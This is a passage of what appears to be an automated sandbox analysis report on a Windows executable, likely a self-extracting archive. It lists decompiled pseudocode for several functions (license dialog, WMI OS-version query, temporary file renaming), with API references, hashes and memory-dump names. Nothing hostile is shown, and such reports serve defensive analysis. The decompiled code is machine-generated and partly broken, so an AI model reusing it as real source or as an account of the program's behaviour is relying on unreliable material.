                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 003EB650
                • SetWindowTextW.USER32(?,?), ref: 003EB661
                • GetDlgItem.USER32(?,00000065), ref: 003EB66A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 003EB67E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 003EB694
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: dcea282d329a831c77757125aac4509e194a67e519d5815663f3343b3b429be9
                • Instruction ID: 35bd6b2403193bbd09041af7c79d0224d662233e3ca1e357d7627b8bee13fe48
                • Opcode Fuzzy Hash: dcea282d329a831c77757125aac4509e194a67e519d5815663f3343b3b429be9
                • Instruction Fuzzy Hash: 1F21E732604264BBE6235F77ED49F3B7B7CEB46B42F014134F641A65E0CB6299019639
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 45%
                			E003EFD10(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				int _t53;
				char* _t58;
				int _t59;
				void* _t60;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				void* _t74;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_t69 = __edx;
				_push(0xfffffffe);
				_push(0x40c130);
				_push(E003F2900);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0x40e7ac; // 0xc24f6281
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(__ebx);
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t69 =  &(_t61[1]);
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t34 = _t62 + 1;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E003EFCF0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E003EFCF0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E003F3E33(_t62);
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E00402010(_t49);
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E003EFCF0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										L003F3E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E003EFCF0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v60;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0x4056f8;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0x403278(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										L003F3E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										_t53 = _t59;
										goto L2;
									}
								}
							}
						}
					}
				} else {
					_t53 = 0;
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t74);
					_pop(_t78);
					_pop(_t60);
					return E003EFBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
				}
			}








































                0x003efd10
                0x003efd13
                0x003efd15
                0x003efd1a
                0x003efd25
                0x003efd26
                0x003efd29
                0x003efd2e
                0x003efd31
                0x003efd33
                0x003efd36
                0x003efd37
                0x003efd38
                0x003efd39
                0x003efd3d
                0x003efd43
                0x003efd46
                0x003efd4b
                0x003efd70
                0x003efd72
                0x003efd75
                0x003efd75
                0x003efd77
                0x003efd78
                0x003efd7c
                0x003efd7e
                0x003efd81
                0x003efd89
                0x003efe4d
                0x003efe52
                0x00000000
                0x003efd8f
                0x003efd9f
                0x003efda1
                0x003efda6
                0x003efe57
                0x003efe57
                0x003efe5f
                0x003efe64
                0x003efe64
                0x003efe6a
                0x00000000
                0x003efdac
                0x003efdac
                0x003efdb3
                0x003efdbc
                0x003efdd4
                0x003efdd5
                0x003efdda
                0x003efddd
                0x003efddf
                0x003efde2
                0x003efdbe
                0x003efdbe
                0x003efdc3
                0x003efdc6
                0x003efdc8
                0x003efdcb
                0x003efdcb
                0x003efe08
                0x003efe43
                0x003efe48
                0x00000000
                0x003efe0a
                0x003efe14
                0x003efe1c
                0x003efe6f
                0x003efe75
                0x003efe78
                0x003efe7d
                0x003efe7d
                0x003efe80
                0x003efe88
                0x003efe8d
                0x003efe8d
                0x003efe93
                0x003efe98
                0x003efe99
                0x003efe9a
                0x003efe9b
                0x003efe9c
                0x003efe9d
                0x003efe9e
                0x003efe9f
                0x003efea0
                0x003efea3
                0x003efea6
                0x003efea7
                0x003efea9
                0x003efeb2
                0x003efeb5
                0x003efeb8
                0x003efebb
                0x003efec4
                0x003efecf
                0x003efed5
                0x003efed7
                0x003efedc
                0x003efe1e
                0x003efe1f
                0x003efe25
                0x003efe2d
                0x003efe30
                0x003efe35
                0x003efe35
                0x003efe3a
                0x00000000
                0x003efe3c
                0x003efe3c
                0x00000000
                0x003efe3c
                0x003efe3a
                0x003efe1c
                0x003efe08
                0x003efda6
                0x003efd4d
                0x003efd4d
                0x003efd4f
                0x003efd55
                0x003efd5d
                0x003efd5e
                0x003efd5f
                0x003efd6d
                0x003efd6d

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C24F6281,00000001,00000000,00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFD99
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE14
                • SysAllocString.OLEAUT32(00000000), ref: 003EFE1F
                • _com_issue_error.COMSUPP ref: 003EFE48
                • _com_issue_error.COMSUPP ref: 003EFE52
                • GetLastError.KERNEL32(80070057,C24F6281,00000001,00000000,00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE57
                • _com_issue_error.COMSUPP ref: 003EFE6A
                • GetLastError.KERNEL32(00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE80
                • _com_issue_error.COMSUPP ref: 003EFE93
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                • String ID:
                • API String ID: 1353541977-0
                • Opcode ID: 3341f8f763f8b3150fc63ed162eb5915febdc63d8077eea9e60c9a8d1b34ad2c
                • Instruction ID: a6ca50326e965d41f9abce9ae13b9f54c80123e49b585c3219dda8c30e9783d4
                • Opcode Fuzzy Hash: 3341f8f763f8b3150fc63ed162eb5915febdc63d8077eea9e60c9a8d1b34ad2c
                • Instruction Fuzzy Hash: 8141DB71A00269AFC7119F65CC45BAFBBA8EF84710F204339F505EB2D1D775A90087A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E003DAF24() {
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed char _t70;
				intOrPtr* _t72;
				signed char** _t75;
				signed char** _t76;
				signed char* _t77;
				intOrPtr* _t78;
				void* _t80;
				signed char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				signed char _t92;
				signed char _t98;
				signed char _t105;
				signed char _t108;
				signed char* _t118;
				signed char _t119;
				signed char _t127;
				signed char _t139;
				void* _t147;
				void* _t149;
				void* _t155;
				void* _t162;

				E003EEB78(0x402919, _t162);
				_push(_t162 - 0x14);
				_push(0x40574c);
				_t105 = 0;
				_push(1);
				_push(0);
				_push(0x40581c);
				 *((intOrPtr*)(_t162 - 0x14)) = 0;
				if( *0x433188() >= 0) {
					_push(L"ROOT\\CIMV2");
					 *((intOrPtr*)(_t162 - 0x10)) = 0;
					_t63 =  *((intOrPtr*)(E003DAE2D(_t162 - 0x20)));
					 *(_t162 - 4) = 0;
					if(_t63 == 0) {
						_t108 = 0;
					} else {
						_t108 =  *_t63;
					}
					_t64 =  *((intOrPtr*)(_t162 - 0x14));
					 *0x403278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
					_t149 = _t66;
					_t110 =  *(_t162 - 0x20);
					if( *(_t162 - 0x20) != 0) {
						E003DAEF6(_t110);
					}
					if(_t149 < 0) {
						L21:
						_t67 =  *((intOrPtr*)(_t162 - 0x14));
						 *0x403278(_t67);
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
						_t70 = 0;
					} else {
						_push(_t105);
						_push(_t105);
						_push(3);
						_push(3);
						_push(_t105);
						_push(_t105);
						_push(0xa);
						_push( *((intOrPtr*)(_t162 - 0x10)));
						if( *0x433184() < 0) {
							L20:
							_t72 =  *((intOrPtr*)(_t162 - 0x10));
							 *0x403278(_t72);
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
							goto L21;
						} else {
							_push("SELECT * FROM Win32_OperatingSystem");
							 *(_t162 - 0x18) = _t105;
							_t75 = E003DADDB(_t162 - 0x28);
							_push("WQL");
							 *(_t162 - 4) = 1;
							_t76 = E003DADDB(_t162 - 0x20);
							_t118 =  *_t75;
							 *(_t162 - 4) = 2;
							if(_t118 == 0) {
								_t139 = _t105;
							} else {
								_t139 =  *_t118;
							}
							_t77 =  *_t76;
							if(_t77 == 0) {
								_t119 = _t105;
							} else {
								_t119 =  *_t77;
							}
							_t78 =  *((intOrPtr*)(_t162 - 0x10));
							 *0x403278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
							_t121 =  *(_t162 - 0x20);
							_t155 = _t80;
							if( *(_t162 - 0x20) != 0) {
								E003DAEF6(_t121);
								 *(_t162 - 0x20) = _t105;
							}
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_t122 =  *((intOrPtr*)(_t162 - 0x28));
							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
								E003DAEF6(_t122);
							}
							if(_t155 >= 0) {
								_t81 =  *(_t162 - 0x18);
								 *(_t162 - 0x1c) = _t105;
								 *(_t162 - 0x24) = _t105;
								if(_t81 != 0) {
									while(1) {
										 *0x403278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
										 *((intOrPtr*)( *_t81 + 0x10))();
										if( *(_t162 - 0x24) == 0) {
											goto L26;
										}
										_t92 =  *(_t162 - 0x1c);
										 *0x403278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
										 *((intOrPtr*)( *_t92 + 0x10))();
										_t105 = _t105 | E003F23F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
										_t98 =  *(_t162 - 0x1c);
										 *0x403278(_t98);
										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
										_t81 =  *(_t162 - 0x18);
										if(_t81 != 0) {
											continue;
										}
										goto L26;
									}
								}
								L26:
								_t82 =  *((intOrPtr*)(_t162 - 0x10));
								 *0x403278(_t82);
								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
								_t85 =  *((intOrPtr*)(_t162 - 0x14));
								 *0x403278(_t85);
								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
								_t127 =  *(_t162 - 0x18);
								 *0x403278(_t127);
								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
								_t70 = _t105;
							} else {
								goto L20;
							}
						}
					}
				} else {
					_t70 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
				return _t70;
			}





























                0x003daf29
                0x003daf38
                0x003daf39
                0x003daf3f
                0x003daf41
                0x003daf42
                0x003daf43
                0x003daf48
                0x003daf53
                0x003daf5c
                0x003daf64
                0x003daf6c
                0x003daf6e
                0x003daf73
                0x003daf79
                0x003daf75
                0x003daf75
                0x003daf75
                0x003daf7b
                0x003daf90
                0x003daf96
                0x003daf99
                0x003daf9d
                0x003daf9f
                0x003dafa4
                0x003dafa6
                0x003dafa6
                0x003dafad
                0x003db05b
                0x003db05b
                0x003db066
                0x003db06c
                0x003db06e
                0x003dafb3
                0x003dafb3
                0x003dafb4
                0x003dafb5
                0x003dafb7
                0x003dafb9
                0x003dafba
                0x003dafbb
                0x003dafbd
                0x003dafc8
                0x003db048
                0x003db048
                0x003db053
                0x003db059
                0x00000000
                0x003dafca
                0x003dafca
                0x003dafd2
                0x003dafd5
                0x003dafdc
                0x003dafe4
                0x003dafe7
                0x003dafec
                0x003dafee
                0x003daff4
                0x003daffa
                0x003daff6
                0x003daff6
                0x003daff6
                0x003daffc
                0x003db000
                0x003db006
                0x003db002
                0x003db002
                0x003db002
                0x003db008
                0x003db01a
                0x003db020
                0x003db023
                0x003db026
                0x003db02a
                0x003db02c
                0x003db031
                0x003db031
                0x003db034
                0x003db038
                0x003db03d
                0x003db03f
                0x003db03f
                0x003db046
                0x003db075
                0x003db078
                0x003db07b
                0x003db080
                0x003db084
                0x003db096
                0x003db09c
                0x003db0a2
                0x00000000
                0x00000000
                0x003db0a4
                0x003db0b9
                0x003db0bf
                0x003db0d5
                0x003db0dc
                0x003db0e2
                0x003db0ed
                0x003db0f3
                0x003db0f5
                0x003db0fa
                0x00000000
                0x00000000
                0x00000000
                0x003db0fa
                0x003db084
                0x003db0fc
                0x003db0fc
                0x003db107
                0x003db10d
                0x003db10f
                0x003db11a
                0x003db120
                0x003db122
                0x003db12d
                0x003db133
                0x003db135
                0x00000000
                0x00000000
                0x00000000
                0x003db046
                0x003dafc8
                0x003daf55
                0x003daf55
                0x003daf55
                0x003db13d
                0x003db145

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                • API String ID: 3519838083-3505469590
                • Opcode ID: 28cb7eb694d4783e64508081f67741000ac72f7d5e2a05493dab13105b18246d
                • Instruction ID: 1af6b61379e815471a04d63a14f1dfe839c2385c3e3900704337ca1ed4851494
                • Opcode Fuzzy Hash: 28cb7eb694d4783e64508081f67741000ac72f7d5e2a05493dab13105b18246d
                • Instruction Fuzzy Hash: 89716C72A00619EFDB15DF64DD95DAEBBB9FF48711B1401AEE412A73A0CB30AD01CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E003D9382() {
				void* _t32;
				short _t33;
				long _t35;
				void* _t40;
				short _t42;
				void* _t66;
				intOrPtr _t69;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E003EEB78(0x4028b1, _t84);
				E003EEC50(0x503c);
				_t82 =  *(_t84 + 8);
				_t32 = _t84 - 0x4048;
				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
				if(_t32 == 0 || _t32 >= 0x800) {
					L20:
					_t33 = 0;
					__eflags = 0;
				} else {
					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
					if(_t35 == 0) {
						goto L20;
					} else {
						_t91 = _t35 - 0x800;
						if(_t35 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E003DC29A(_t91, _t84 - 0x4048);
							_t78 = E003DC29A(_t91, _t84 - 0x5048);
							_t69 = 0;
							if( *_t39 == 0) {
								goto L20;
							} else {
								_t40 = E003E1FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t40;
								if(_t40 == 0) {
									goto L20;
								} else {
									_t42 = E003E1FBB(E003DC29A(_t93, _t82), _t78);
									if(_t42 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t42;
										_t79 = 0;
										while(1) {
											_t95 = _t42;
											if(_t42 != 0) {
												break;
											}
											E003E0602(_t84 - 0x1010, _t82, 0x800);
											E003D4092(E003DC29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E003DA231(_t84 - 0x1010) == 0) {
												_t42 =  *(_t84 - 0x1010);
											} else {
												_t42 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t42;
												if(_t42 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E003E0602(_t84 - 0x3048, _t82, 0x800);
										_push(0x800);
										E003DC310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E003D9556(_t84 - 0x2048);
											 *((intOrPtr*)(_t84 - 4)) = _t69;
											if(E003DA231(_t82) == 0) {
												_t69 = E003D966E(_t84 - 0x2048, _t82, 0x12);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
											if(_t69 != 0) {
												E003D9620(_t84 - 0x2048);
												E003D974E(_t84 - 0x2048);
											}
											E003D959A(_t84 - 0x2048);
											_t33 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t33;
			}
















                0x003d9387
                0x003d9391
                0x003d9398
                0x003d939b
                0x003d93aa
                0x003d93b2
                0x003d9543
                0x003d9543
                0x003d9543
                0x003d93c0
                0x003d93c9
                0x003d93d1
                0x00000000
                0x003d93d7
                0x003d93d7
                0x003d93d9
                0x00000000
                0x003d93df
                0x003d93eb
                0x003d93fa
                0x003d93fc
                0x003d9401
                0x00000000
                0x003d9407
                0x003d940b
                0x003d9410
                0x003d9412
                0x00000000
                0x003d9418
                0x003d9420
                0x003d9427
                0x00000000
                0x003d942d
                0x003d942d
                0x003d9434
                0x003d9436
                0x003d9436
                0x003d9439
                0x00000000
                0x00000000
                0x003d9448
                0x003d9465
                0x003d946a
                0x003d947b
                0x003d9488
                0x003d947d
                0x003d947d
                0x003d947f
                0x003d947f
                0x003d948f
                0x003d9498
                0x00000000
                0x003d949a
                0x003d949a
                0x003d949d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003d949d
                0x00000000
                0x003d9498
                0x003d94b1
                0x003d94b6
                0x003d94c1
                0x003d94dc
                0x00000000
                0x003d94de
                0x003d94e4
                0x003d94ea
                0x003d94f4
                0x003d9504
                0x003d9504
                0x003d9514
                0x003d951c
                0x003d9524
                0x003d952f
                0x003d952f
                0x003d953a
                0x003d953f
                0x003d953f
                0x003d94dc
                0x003d9427
                0x003d9412
                0x003d9401
                0x003d93d9
                0x003d93d1
                0x003d9545
                0x003d954b
                0x003d9553

                APIs
                • __EH_prolog.LIBCMT ref: 003D9387
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003D93AA
                • GetShortPathNameW.KERNEL32 ref: 003D93C9
                  • Part of subcall function 003DC29A: _wcslen.LIBCMT ref: 003DC2A2
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • _swprintf.LIBCMT ref: 003D9465
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • MoveFileW.KERNEL32(?,?), ref: 003D94D4
                • MoveFileW.KERNEL32(?,?), ref: 003D9514
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                • String ID: rtmp%d
                • API String ID: 3726343395-3303766350
                • Opcode ID: 84333e47ccc77e4a3409c3208d3bcef3e7582561d49ee675503ceedc18e035a7
                • Instruction ID: 2b4aa9a7ae9183952a14e19f39690f1a27e7bf063704478fcbf6ac4be9a587f2
                • Opcode Fuzzy Hash: 84333e47ccc77e4a3409c3208d3bcef3e7582561d49ee675503ceedc18e035a7
                • Instruction Fuzzy Hash: 564153B2900259A6CF22EB61AD45FDE737DAF45340F0048B7B649A7251DB388B898B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D1100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                Download Yara Rule
                C-Code - Quality: 52%
                			E003D1100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1114;
				char _v1116;
				void* __edi;
				signed int _t44;
				signed int _t52;
				intOrPtr _t67;
				short* _t80;
				void* _t83;
				char _t84;
				signed int _t85;
				void* _t87;
				signed int _t97;

				_t79 = _a16;
				_t81 =  &_v1116;
				if(_a16 != 0) {
					E003E0602( &_v1116, _t79, 0x200);
					_t87 =  &_v1114 + E003F3E13( &_v1116) * 2;
					E003E0602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
					_t81 = _t87 + E003F3E13(_t87) * 2 + 2;
				}
				E003E0602(_t81, E003DE617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
				_t83 = _t81 + E003F3E13(_t81) * 2 + 2;
				E003E0602(_t83, 0x4035f0, 0x200 - (_t83 -  &_v1116 >> 1));
				_t44 = E003F3E13(_t83);
				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
				_t84 = 0x58;
				E003EFFF0(_t79,  &_v92, 0, _t84);
				_t67 = _a20;
				_t80 = _a12;
				_v88 = _a4;
				_v84 =  *0x411028;
				_v80 =  &_v1116;
				_v44 = _a8;
				_v92 = _t84;
				_v64 = _t80;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_t67 == 0) {
					_t52 =  *0x433044();
				} else {
					_t52 =  *0x43303c();
				}
				_t85 = _t52;
				if(_t85 == 0) {
					_t52 =  *0x433040();
					if(_t52 == 0x3002) {
						 *_t80 = 0;
						_push( &_v92);
						if(_t67 == 0) {
							_t52 =  *0x433044();
						} else {
							_t52 =  *0x43303c();
						}
						_t85 = _t52;
					}
					_t97 = _t85;
				}
				return _t52 & 0xffffff00 | _t97 != 0x00000000;
			}























                0x003d110c
                0x003d110f
                0x003d111c
                0x003d1123
                0x003d1137
                0x003d114d
                0x003d115c
                0x003d115c
                0x003d117c
                0x003d1191
                0x003d11a3
                0x003d11a9
                0x003d11b2
                0x003d11ba
                0x003d11be
                0x003d11c9
                0x003d11cc
                0x003d11cf
                0x003d11d7
                0x003d11e0
                0x003d11e6
                0x003d11ec
                0x003d11ef
                0x003d11f2
                0x003d11f9
                0x003d1200
                0x003d1203
                0x003d120d
                0x003d1205
                0x003d1205
                0x003d1205
                0x003d1213
                0x003d1217
                0x003d1219
                0x003d1224
                0x003d1228
                0x003d122e
                0x003d1231
                0x003d123b
                0x003d1233
                0x003d1233
                0x003d1233
                0x003d1241
                0x003d1241
                0x003d1243
                0x003d1243
                0x003d124c

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: U>$p>$z>
                • API String ID: 176396367-3601670778
                • Opcode ID: f439ca8e0780f67698394a85f9f8ee6937ea5b005550de99926dddad652baa20
                • Instruction ID: cddb67e22cadef26aa21e29947ab25d734dc88b74d3fff2a47368af3e9e7049a
                • Opcode Fuzzy Hash: f439ca8e0780f67698394a85f9f8ee6937ea5b005550de99926dddad652baa20
                • Instruction Fuzzy Hash: FF41C9729006695BCB269F789D05AEFBBBCEF10311F00012AFD45F7245DB70AE458BA4
                Uniqueness

                Uniqueness Score: -1.00%

